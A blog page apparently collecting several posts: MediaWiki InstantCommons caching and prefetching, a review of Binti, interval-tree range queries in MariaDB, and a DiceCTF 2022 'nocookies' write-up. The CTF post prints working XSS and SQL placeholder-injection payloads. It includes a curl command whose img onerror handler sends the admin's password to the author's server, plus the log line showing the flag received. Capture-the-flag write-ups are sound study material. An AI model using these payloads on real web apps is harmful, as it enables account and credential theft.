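For example, a Commons thumbnail URL can be derived from the original file URL that the metadata request already returned, so no extra round-trips are needed just to learn where the thumbnail will live. A rough sketch of the idea (a hypothetical helper; real code also has to handle formats like SVG or PDF, whose thumbnails get an extra extension appended):

// e.g. https://upload.wikimedia.org/wikipedia/commons/a/ab/Example.jpg
//  becomes .../commons/thumb/a/ab/Example.jpg/300px-Example.jpg
function guessThumbUrl( string $originalUrl, int $width ): string {
        $name = basename( $originalUrl );
        $thumbBase = str_replace( '/wikipedia/commons/', '/wikipedia/commons/thumb/', $originalUrl );
        return $thumbBase . '/' . $width . 'px-' . $name;
}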

Adding this optimization took the time down from 139 seconds with just HTTP/2 to 18.5 seconds with both this and HTTP/2. This is 56 times faster than what we started with!



Prefetching

18.5 seconds is pretty good. But can we do better?

We might not be able to if we actually have to fetch all the images, but there is a pattern we can exploit.

Generally when people edit an article, they might change a sentence or two, but often don't alter the images. Other times, MediaWiki might re-parse a page even if there are no changes to it (e.g. due to a cache expiry). As a result, the set of images we need is often the same as, or close to, the set that we needed for the previous version of the page. This set is already recorded in the database in order to display what pages use an image on the image description page.

We can use this. First we retrieve this list of images used on the previous version of the page. We can then fetch all of these at once, instead of having to wait for the parser to tell us one at a time which image we need.
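A rough sketch of the idea (hypothetical code, not the extension's actual implementation), assuming core's imagelinks table, which records which files each page uses, with $pageId being the page we are about to parse:

// Files used by the previous version of the page.
$dbr = wfGetDB( DB_REPLICA );
$names = $dbr->selectFieldValues( 'imagelinks', 'il_to', [ 'il_from' => $pageId ], __METHOD__ );

// Ask the remote API about all of them in batched requests
// (the API accepts up to 50 titles joined with "|").
foreach ( array_chunk( $names, 50 ) as $chunk ) {
        $titles = implode( '|', array_map( static fn ( $n ) => "File:$n", $chunk ) );
        // ...fire off api.php?action=query&prop=imageinfo&titles=$titles in the background...
}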

It is possible of course, that this list could be totally wrong. Someone could have replaced all the images on the page. If it's right, we speed up by pre-fetching everything we need, all in parallel. If it's wrong, we fetched some things we didn't need, possibly making things slower than if we did nothing.

I believe in the average case, this will be a significant improvement. Even in the case that the list is wrong, we can send off the fetch in the background while MediaWiki does other page processing - the hope being that MediaWiki does other stuff while this fetch is running, so if it is fetching the wrong things, time is not wasted.

On my test page, using this brings the time to render (Where the previous version had all the same images) down to 1.06 seconds. A 980 times speed improvement! It should be noted, that this is time to render in total, not just time to fetch images, so most of that time is probably related to rendering other stuff and not instant commons.

Caching

All the above is assuming a local cache miss. It is wasteful to request information remotely, if we just recently fetched it. It makes more sense to reuse information recently fetched.

In many cases, the parser cache, which in MediaWiki caches the entire rendered page, will mean that instant commons isn't called that often. However, some extensions that create dynamic content make the parser cache very short lived, which makes caching in instant commons more important. It is also common for people to use the same images on many pages (e.g. A warning icon in a template). In such a case, caching at the image fetching layer is very important.

There is a downside though: we have no way to tell if upstream has modified the image. This is not that big a deal for most things. Exif data being slightly out of date does not matter that much. However, if the aspect ratio of the image changes, then the image will appear squished until InstantCommons' cache is cleared.

To balance these competing concerns, Quick InstantCommons uses an adaptive cache. If the image has existed for a long time, we cache for a day (configurable). After all, if the image has been stable for years, it seems unlikely that it is going to be edited again very soon. However, if the image has been edited recently, we use a dynamically determined, shorter time to live. The idea being: if the image was edited 2 minutes ago, there is a much higher possibility that it might be edited a second time. Maybe the previous edit was vandalism, or maybe it just got improved further.

As the cache entry for an image begins to get close to expiring, we refetch it in the background. The hope is that we can use the soon-to-be-expired version now, while refetching it in the background as MediaWiki processes other things. Next time we will have a fresh version, but we never have to stall while the parse is blocked waiting for the image's information. That way things are kept fresh without a negative performance impact.
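To illustrate the adaptive part (a sketch of the concept only, not the extension's actual formula): the more recently the file changed, the shorter the time we are willing to cache it.

// Hypothetical sketch: pick a TTL based on how recently the image was touched.
function adaptiveTtl( int $lastChangeTimestamp, int $maxTtl = 86400 ): int {
        $age = time() - $lastChangeTimestamp;
        // Cache for roughly a tenth of the image's age, within sane bounds:
        // a file edited five minutes ago is cached for about 30 seconds, while
        // one that has been stable for years gets the full day.
        return (int)min( $maxTtl, max( 30, $age / 10 ) );
}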

MediaWiki's built-in instant commons did support caching; however, it wasn't configurable and the default time to live was very low. Additionally, the adaptive caching code had a bug in it that prevented it from working correctly. The end result was that often the cache could not be used effectively.

Missing MediaHandler Extensions

In MediaWiki's built-in InstantCommons feature, you need to have the same set of media extensions installed to view all files. For example, PDFs won't render via instant commons without Extension:PDFHandler.

This is really unnecessary where the file type just renders to a normal image. After all, the complicated bit is all on the other server. My extension fixes that, and does its best to show thumbnails for file types it doesn't understand. It can't support advanced features without the appropriate extension (e.g. navigating in 3D models), but it will show a static thumbnail.

Conclusion

In the end, by making a few, relatively small changes, we were able to improve the performance of instant commons significantly. 980 times as fast!

Do you run a MediaWiki wiki? Try out the extension and let me know what you think.

Footnotes:

¹ This is assuming default settings and an [object] cache miss. This may be different if $wgResponsiveImages is false in which case high-DPI images won't be fetched, or if apiThumbCacheExpiry is set to non-zero in which case thumbnails will be downloaded locally to the wiki server during the page parse instead of being hotlinked.


² This role actually rotates between the Virginia & Texas data centers. Additionally, the Texas DC (when not primary) does do some things that the caching DCs don't, but that isn't particularly relevant to this topic. There are eventual plans to have multiple active DCs which would all be able to respond to the type of API queries being made here, but they are not complete as of this writing - https://www.mediawiki.org/wiki/Wikimedia_Performance_Team/Active-active_MediaWiki


³ The MediaWiki API actually supports an smaxage=<number of seconds> (shared maximum age) url parameter. This tells the API server you don't care if your request is that many seconds out of date, and to serve it from varnish caches in the local caching data center if possible. Unlike with normal Wikipedia page views, there is no cache invalidation here, so it is rarely used and it is not used by instant commons.





Friday, July 8, 2022

Book review: Binti

 I've never written a book review before, but what is a blog if not a platform to give your uninformed opinion to people who don't care about it :)


Recently I read the novella Binti by Nnedi Okorafor. I saw it on the shelf at the library and remembered it being pretty popular back when it was released, so I thought I would give it a go. Overall, I liked it up to the ending, which I strongly disliked.

In general, it seemed like a fun coming of age/space opera-esque story. You have a main character who is an outsider and unsure of herself. Due to circumstances beyond her control she is thrust into the middle of an interplanetary conflict that only she can resolve, thanks to the unique traits which originally marked her as an outsider.

None of this is particularly groundbreaking - I have read many stories with that type of plot structure - but it still makes for a fun story. The weird part here is that I don't think this is the type of story the author intended to write. From what I remember of this book's release, the selling point was supposed to be how it explored the main character's culture (which from what I understand is based on the real human culture of the Himba people). However, to me, that seemed like the weakest and most superficial part of the book. All we really get is that they don't like outsiders, and use an ointment made of mud that is very culturally important. We get very little in terms of why this is meaningful to the character, or how it affects her worldview, etc.

It's a reasonably common theme to explore "culture" in science fiction works. Admittedly, it is somewhat rarer, but definitely not unheard of, to explore it as an end in itself. More common is to have an alien culture to juxtapose against contemporary mainstream culture, to make some point about the mainstream culture of the context the writer is writing in. Novels such as The Dispossessed and Stranger In A Strange Land come to mind as novels that posit some alien culture to contrast with contemporary culture. Other times alien characters have a unique culture to provide an aesthetic of otherness for them. Consider how boring most aliens in Star Trek are compared to the Klingons, who have a much better developed cultural backstory. Or how alien the aliens feel in the Lilith's Brood series. Even if the cultural exploration is arguably not the primary point of these novels, the cultures they explore feel rounded and fleshed out. The cultural depiction in Binti seems flat comparatively, because even if it's tied to a real culture, it was barely explored in the novella.

Ultimately I felt like this novella worked as a fun space adventure; it didn't work as an interesting cultural exploration.

Last of all: the ending [Major spoilers ahead]

The ending ruined the book for me. It did not make sense in terms of character logic nor character emotion.

Basically - the aliens, who are very isolationist, are mad because the university stole the stinger of one of their leaders to display as an artifact. So they decide to murder everyone on a ship full of students in order to sneak in and retrieve it (or die trying). The situation is resolved by the university saying sorry, claiming that doing such a thing was against policy, and the appropriate people will be punished. Additionally one of the aliens was invited to be an exchange student.

To me, this felt just one step above "it was all a dream". It makes no sense how the university could accidentally have obtained the artifact without realizing it was unethically sourced. Some researchers just show up with an alien body part, from aliens who generally refuse to talk to outsiders, and everyone just assumed the alien gave consent for this? It is difficult to reconcile these plot points logically, unless the university was intentionally turning a blind eye, in which case, why would their apology be accepted? Second, nobody was at all upset that everyone on the ship was slaughtered. I could understand maybe letting bygones be bygones for the greater good - but they should at least be a little sad about it. Nobody seemed to care at all.

In conclusion: Generally fun plot. The "cultural" aspects were superficial and overrated. Ending sucked.






Sunday, May 1, 2022

Finding if an item is a list of ranges stored in a DB

Recently, I've decided to experiment with making a reporting extension for MediaWiki (working name "Sofa") as a side project. There are already several options in this space, notably Cargo, Semantic MediaWiki (SMW) and DynamicPageList (DPL). However, I think the design space is still a little under-explored. My goal is to experiment with some rather different design choices and see what I end up with. In particular, I want to make one that respects the core wiki philosophies of "quick" - changes are reflected immediately - and "soft security" - nothing users can do, whether accidentally or maliciously, causes any (performance) harm, and anything they do can simply be reverted. Current solutions often require manual cache purging to see changes reflected and can have unpredictable, user-dependent performance characteristics, where subtle user choices in extreme cases could even cause a DB overload.

I don't want to talk too much about the new extension generally, as that's not what this blog post is about and I am still in the early stages. However one design requirement that left me in a bit of a conundrum is the automatic cache purging one. In the model for this extension, we have ordered lists of items and pages that display a range of items from the list. In order to support cache purging when someone adds a new entry that would appear in a used range, we need some way to store what ranges of items are used by what pages so that given a specific item, we can query which pages use a range containing that item. This turned out to be surprisingly difficult. I thought I'd write a post about the different methods I considered. 

The naive approach

For example, we might have the following list of alphabetically ordered items:

id | item
17 | Alpha
12 | Atom
21 | Beta
34 | Bobcat
 8 | Bonsai Tree

And a page might want to include all items between Amoeba and Bobcat (Note that Amoeba is not actually in the list).

In this example, we need some way to record that the page is using items between Amoeba and Bobcat, so if someone inserts Badger into the list, the page using the list gets refreshed.

The natural way of doing this would be a MariaDB table like the following:

list_cache table

id | page_id | list_start | list_end
 1 | 1234    | Amoeba     | Bobcat

Along with 2 indices: one on list_start and the other on list_end.[1]

In the event Badger gets added to the list, we would need to query what pages to refresh. In this structure we would use a query like: SELECT page_id FROM list_cache WHERE "Badger" BETWEEN list_start AND list_end; 

This all works. However, there is one problem: to answer that query the DB has to look at a number of rows besides the rows we're interested in. For best performance, we ideally want the database to look at as few rows as possible to answer our query. Ideally it would only look at rows that are relevant to the answer.

An index in the database is an ordered list of rows from a table - like a phonebook. In this case we have two - one for the start of the range and one for the end. In essence we want information from both; however, that's not how it works.

"'badger' BETWEEN list_start AND list_end" is really just a fancy way of saying list_start < 'badger' AND list_end > 'badger'. The RDBMS then has a choice to make: It can use the list_start index, go to the spot in that index where badger would be, and then work its way down to the bottom of the list, checking each row individually for if the second condition is true. Alternatively it can pull up the list_end index and do the same thing but reversed.

However, once it picks an index and goes to its starting place, it has to look at every entry until it hits the beginning (respectively, the end) of the index. If the starting place is in the middle of the index, it has to look at roughly half the rows in the table to answer the query. If this system were used at scale and the table had 2 million rows, the database might have to look at a million rows just to find the 3 that match. This is definitely not ideal.
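If you want to see this for yourself, MariaDB's EXPLAIN gives a rough idea of how many rows it expects to examine; the exact plan will of course depend on your data and indexes:

-- The "rows" column of the output is the optimizer's estimate of how many
-- index entries it will have to scan in order to answer the query.
EXPLAIN SELECT page_id FROM list_cache WHERE 'Badger' BETWEEN list_start AND list_end;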

 

[1] Potentially you could instead use compound indexes on (list_start, list_end) and (list_end, list_start), which allows the DB to look directly at the index instead of constantly looking up each row in the underlying table. I'm unclear on whether the benefit of index-condition-pushdown outweighs the increased index size - I suspect it mildly would - but either way things are still rather inefficient.
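In other words, replacing the two single-column indexes with something like this (again, just a sketch):

CREATE INDEX cache_start_end ON list_cache (list_start, list_end);
CREATE INDEX cache_end_start ON list_cache (list_end, list_start);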

Interval trees

At this point, like any good programmer, I started googling and trawling stack overflow. Eventually I stumbled upon the article "A Static Relational Interval Tree" by Laurent Martin on the SolidQ blog.

At first glance this seemed like exactly the solution I was looking for. On second glance - not so much. This is a really cool technique; unfortunately it scales with the number of bits needed to represent the data type you are using. If I was looking at ranges of integers, dates or IP addresses, this would be perfect. Unfortunately I am using strings, which take a large number of bits. Nonetheless, I'm going to describe the technique, as I think it's really cool and should be more widely known.

The core idea is to separate the different ranges into a number of buckets. Each bucket can be queried separately but efficiently - any row that the DB has to look at is a row that would match the query. In order to find all the ranges that contain a specific point, you just need to query all the applicable buckets. The number of applicable buckets in the worst case is the same as the number of bits needed to represent the data type (hence the applicability to ranges of ints but not long strings).

The end result is: if you are using ranges of 32-bit integers, you would have to do 32 really efficient separate queries (or 1 query after UNIONing them together). For a large DB, this is much better than 1 inefficient query that might read millions of rows or more.

For simplicity, in the explanation I will use 4-bit integers (0-15).

Buckets

So, what are these buckets? They are simply the shared binary prefix of the two ends of the range with a 1 followed by 0's appended to fill out the rest of the binary number. Here are some examples:

Range start | Range end  | Shared prefix | Bucket
10 (1010b)  | 13 (1101b) | 1             | 12 (1100b)
9 (1001b)   | 10 (1010b) | 10            | 10 (1010b)
9 (1001b)   | 9 (1001b)  | 1001          | 9 (1001b)

In the database, we can use virtual columns to have MariaDB manage this for us, using the formula range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2))):

CREATE TABLE ranges (
    id int unsigned PRIMARY KEY AUTO_INCREMENT,
    range_start int NOT NULL,
    range_end int NOT NULL,
    bucket int as (range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2))))
);
CREATE INDEX start on ranges (bucket, range_start);
CREATE INDEX end on ranges (bucket, range_end);

Now we can just insert things like normal, and MariaDB will take care of calculating the bucket number.
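For example, inserting the three ranges from the table above, the bucket column should come out to 12, 10 and 9 respectively, giving a quick sanity check that the formula matches the shared-prefix rule:

INSERT INTO ranges (range_start, range_end) VALUES (10, 13), (9, 10), (9, 9);

-- The bucket column is computed automatically; this should show 12, 10 and 9.
SELECT range_start, range_end, bucket FROM ranges;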

Querying

This has the following useful property: Any range assigned to bucket number n must contain the value n. For example, bucket 12 might have the range [10,13] in it, or [12,12], all of which contain the point 12. It would not be able to have the range [10,11] as that does not go through the point 12.

This is useful, since if we have a specific number of interest, we can easily query a bucket to see which of its ranges contain it. For example, if we wanted to know all the ranges in bucket 12 containing 9, we can query WHERE bucket = 12 AND range_start <= 9, since any range in bucket 12 must contain the value 12, so any such range that starts at or before 9 must pass through 9 on its way to 12. If we have an index on (bucket, range_start), this is a really efficient query that only looks at rows that are of interest. Similarly, if the number of interest is greater than the bucket number, we do the same thing, just with range_end >= instead.
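Concretely, the single-bucket lookup from that example might look like:

-- Ranges in bucket 12 that contain the point 9: every range in bucket 12
-- reaches up to at least 12, so it is enough to check where the range starts.
SELECT id, range_start, range_end FROM ranges WHERE bucket = 12 AND range_start <= 9;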

Now that we know how to get all the relevant ranges from one bucket efficiently, we just need to figure out what all the relevant buckets are, and we have a solution (remembering that we need to consult at most as many buckets as there are bits in the data type).

Finding the buckets

To find the buckets, we simply take the first x bits of the binary representation and append 1 followed by 0s to fill out the number, for all x.

For example, if we wanted to find all the buckets that are relevant to ranges containing 9 (1001b):

buckets that can contain 9 (1001b)
bits masked | prefix | bucket    | top or bottom
0           |        | 8 (1000)  | top
1           | 1b     | 12 (1100) | bottom
2           | 10b    | 10 (1010) | bottom
3           | 100b   | 9 (1001)  | top (either)

We would have to look at buckets 8, 12, 10 and 9. If the bit immediately after the prefix is a 1 (or equivalently, if our point >= bucket), we have to look at the top of the bucket; otherwise, we look at the bottom. By this, we mean whether the query is range_end >= point or range_start <= point respectively.

So with that in mind, in our example we would make a query like:

SELECT id, range_start, range_end FROM ranges WHERE bucket = 8 and range_end >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 12 and range_start <= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 10 and range_start <= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 9 and range_end >= 9;

Which is a union of queries that each individually are very efficient.

To generate this, you might use code like the following (in php):

define( "MAX_BITS", 4 );
function makeQuery ( $target ) {
	$mask = 0;
	$query = '';
	for ( $i = MAX_BITS-1; $i >= 0; $i-- ) {
		// Running mask covering the top (MAX_BITS - $i) bits.
		$mask = $mask | (1<<$i);
		// The prefix mask: every bit above the current position.
		$tmpMask = $mask ^ (1<<$i);
		// A 1 in the current position, followed by 0s.
		$pad = 1 << $i;
		// The bucket is the prefix of $target, then a 1, then 0s.
		$bucket = ($target & $tmpMask) | $pad;

		$query .= "SELECT id, range_start, range_end FROM ranges WHERE bucket = $bucket ";
		if ( $target < $bucket ) {
			// Ranges in this bucket reach up to at least $bucket,
			// so they contain $target iff they start at or below it.
			$query .= "AND range_start <= $target ";
		} else {
			// Ranges in this bucket start at or below $bucket,
			// so they contain $target iff they end at or above it.
			$query .= "AND range_end >= $target ";
		}
		if ( $i != 0 ) {
			$query .= "\nUNION ALL ";
		}
	}
	return $query . ";";
}

 

 

Tuesday, February 8, 2022

Write up for DiceCTF 2022: nocookies

Last weekend I participated in DiceCTF. There were some very interesting challenges and I had a lot of fun. Here is a write-up for one of the challenges I solved.

For this challenge, we're presented with a note-keeping app. It allows storing either plaintext or markdown notes. The main distinction is that instead of using cookies, it just asks you for a password on every page load.

The admin bot

The challenge also includes an admin bot that you can give urls to visit. Here is a snippet from its code:

    // make an account
    const username = Array(32)
      .fill('')
      .map(() => Math.floor(Math.random() * 16).toString(16))
      .join('');
    const password = flag;

    const firstLogin = doLogin(username, password);

    try {
      page.goto(`https://no-cookies-${instance}.mc.ax/register`);
    } catch {}

    await firstLogin;

    await sleep(3000);

    // visit the note and log in
    const secondLogin = doLogin(username, password);

    try {
      page.goto(url);
    } catch {}

    await secondLogin;

As we can see from the bot code, it creates an account with a random username, with the password being the flag we are trying to obtain. Since it first visits one page, and then a second of our choosing, this is a strong hint that the intended solution is some sort of XSS to exfiltrate the password.

The view code

Since I suspected that we were looking for an XSS, and I knew the app supported markdown, a good first place to look was the markdown rendering code. This happened entirely client-side on the view note page. Here is the relevant snippet:

<script>
  (() => {
    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

    const promptValid = (text) => {
      let result = prompt(text) ?? '';
      return validate(result) ? result : promptValid(text);
    }

    const username = promptValid('Username:');
    const password = promptValid('Password:');

    const params = new URLSearchParams(window.location.search);

    (async () => {
      const { note, mode, views } = await (await fetch('/view', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          username,
          password,
          id: params.get('id')
        })
      })).json();

      if (!note) {
        alert('Invalid username, password, or note id');
        window.location = '/';
        return;
      }

      let text = note;
      if (mode === 'markdown') {
        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

        text = text.replace(/#\s*([^\n]+)/g, (match, p1) => {
          return `<h1>${p1}</h1>`;
        });
        text = text.replace(/\*\*([^\n]+)\*\*/g, (match, p1) => {
          return `<strong>${p1}</strong>`;
        });
        text = text.replace(/\*([^\n]+)\*/g, (match, p1) => {
          return `<em>${p1}</em>`;
        });
      }

      document.querySelector('.note').innerHTML = text;
      document.querySelector('.views').innerText = views;
    })();
  })();
</script>
 

The first thing I was drawn to was this part:

        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

Which looks for syntax like [Link text](https://urltolinkto.com) and replaces it with a link. A keen eye would notice that the url is allowed to contain double quotes ("), which don't get escaped. This allows you to add extra attributes to the <a> tag. For example, [link text](http://example.com" class="foo) gets turned into <a href="http://example.com" class="foo">link text</a>. This can be used as an XSS via html event handlers. For example, [link](https://example.com" onmouseover="alert`1`) will show an alert box if you hover over the link with your mouse.

A lack of user interaction 

However, the admin bot doesn't have a mouse, and doesn't interact with the page. So how do we make the XSS trigger? We can't tell it to hover over the link.

This took me a little while, because I was testing on Firefox, but the admin bot uses Chrome, and the behaviour is mildly different. Eventually though, I found out that in Chrome you can use the autofocus attribute to force focus to the element, and use an onfocus handler to execute code:

[foo](http://example.com" autofocus=autofocus onfocus="alert`1`)

This will pop the alert box immediately on page view, including for the admin bot.

Problem solved, right? Wait...

With that, I assumed I had solved the problem. All I had to do was read the password variable and send it off to a webserver I control.

So to check if that would work, first I tried:


[foo](http://example.com" autofocus=autofocus onfocus="alert(password&#x29;)

Note: The ) had to be escaped as &#x29; because the regex for the url part stops at the first ")".

...and got a pop-up saying "undefined". Whoops. Looking back at the view code, I see that const password is defined inside an anonymous arrow function, and my code executes outside of it (since it's coming from an HTML event handler), so the password variable is not in scope.

At this point, I got stumped for a little bit.

Looking back at the code, I noticed that it was validating the password a bit weirdly

     const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

It was basically checking that the password has at least 1 character and does not contain apostrophes or dollar signs, which is just a bit random. If this was actually important, you would do it on the server side. In a CTF, one of the key things to do is look for code that sticks out, or code that looks like something you wouldn't normally write when writing software. This validate function looked a bit suspicious to me, although to be honest, I only thought that because I was fairly stuck at this point.

I had a vague memory of early JS having some weird design choices around regexes, so I decided to read up on RegExp in JavaScript. Eventually I found this page https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input which was very relevant to the matter at hand.

In short, whenever you run a regex in JavaScript, JS saves the text you ran it against as a static property of the RegExp class, and you can access it later by looking at RegExp.input.

This is, first of all, crazy (thanks, JS). However, it seemed perfect for this situation. I assumed that since the password was the last thing .test() was run on, I could obtain it from RegExp.input.

However, there was a problem. All the .replace() calls from the markdown parsing also set RegExp.input, overriding the password. It seemed like I was at an impasse.

The app did support plaintext notes, which wouldn't run the problematic .replace() calls. If I could somehow get an XSS into a plaintext note, then I could use the RegExp.input trick.

Perhaps the markdown XSS I found was a red herring, and I needed to look elsewhere.

 On to an SQL injection

Looking at the view code, if the note is a plaintext note, then it is inserted directly into the document without any escaping on the client side. All the escaping takes place on the backend at insert time. Let's take a look at the backend code:

 const db = {
  prepare: (query, params) => {
    if (params)
      for (const [key, value] of Object.entries(params)) {
        const clean = value.replace(/['$]/g, '');
        query = query.replaceAll(`:${key}`, `'${clean}'`);
      }
    return query;
  },

[...]
  run: (query, params) => {
    const prepared = db.prepare(query, params);
    console.log( prepared );
    return database.prepare(prepared).run();
  },
};

[...]

  db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)', {
    id,
    username,
    note: note.replace(/[<>]/g, ''),
    mode,
  });

 

As you can see, the app strips < and > when inserting a note into the DB. It doesn't seem like there's any way to get an XSS past that filter.

However, the prepare function has a flaw that lets us manipulate how SQL queries are generated in general.

The prepare function replaces placeholders like :note with their escaped values one at a time. However, it doesn't check whether a parameter value itself contains a placeholder. For example, if your username is the literal string ":note", the SQL query gets mangled when :note is later replaced inside the already-substituted username.

As an example, consider how the following query would be prepared:

db.run( 'INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: "12345",
    username: ":note",
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }
);

Let's run through what would happen when preparing this query.

We start with:


INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)

We replace :id with '12345'

INSERT INTO notes VALUES ('12345', :username, :note, :mode, 0)

We replace :username with ':note'

 INSERT INTO notes VALUES ('12345', ':note', :note, :mode, 0)

We replace :note with ', :mode, 22, 0)-- '. Since prepare uses replaceAll, this replaces both the real :note placeholder and the ':note' we snuck in as the username.

 INSERT INTO notes VALUES ('12345', '', :mode, 22, 0)-- '', ', :mode, 22, 0)-- ', :mode, 0)

We replace :mode with '<img src=x onerror="alert(RegExp.input)">'

 INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- '', ', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- ', '<img src=x onerror="alert(RegExp.input)">', 0)

Note that -- is the SQL comment character, so the end result is effectively:

  INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0);

 bypassing the XSS filter, since the stripping of < and > was only applied to the note parameter and our HTML came in via the mode parameter.

Success

In the end we have inserted a plaintext note containing malicious JavaScript (any note whose mode is not 'markdown' is considered plaintext). I visited the page, and I got a pop-up with my password.

Now all we need to do is make a payload that instead of showing the password in an alert box, exfiltrates the password to us.

I pre-registered an account with username ":note" and password "password". I then created a note with the following curl command:

$ curl 'https://no-cookies-0ac0b52c95f3abe3.mc.ax/create' -H 'Content-Type: application/json' --data-raw '{"username":":note","password":"password","note":",:mode, 22, 0)-- ","mode":"<img src=x onerror=\"window.location=&quot;https://bawolff.net?&quot;+RegExp.input\">"}'


{"id":"32e8c795bb8b44b74d52d74e261a2942"}

 
I then input the view url into the admin bot service, waited for the admin bot to visit it, and watched my webserver log. Sure enough, I soon saw:

34.139.106.105 - - [06/Feb/2022:08:52:49 +0000] "GET /?dice{curr3nt_st4t3_0f_j4v45cr1pt} HTTP/1.1" 200 5514 "https://no-cookies-0ac0b52c95f3abe3.mc.ax/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4855.0 Safari/537.36" 

Thus the flag is dice{curr3nt_st4t3_0f_j4v45cr1pt} 

 

p.s. I hear that RegExp.input isn't the only possible solution. I definitely would not have been able to think of something like this, but I heard some teams used a really ingenious solution involving replacing the document.querySelector and JSON.stringify functions and re-calling the inner async anonymous function, so that the attacker-controlled replacement JSON.stringify function gets called with the password. Which is an absolutely beautiful exploit.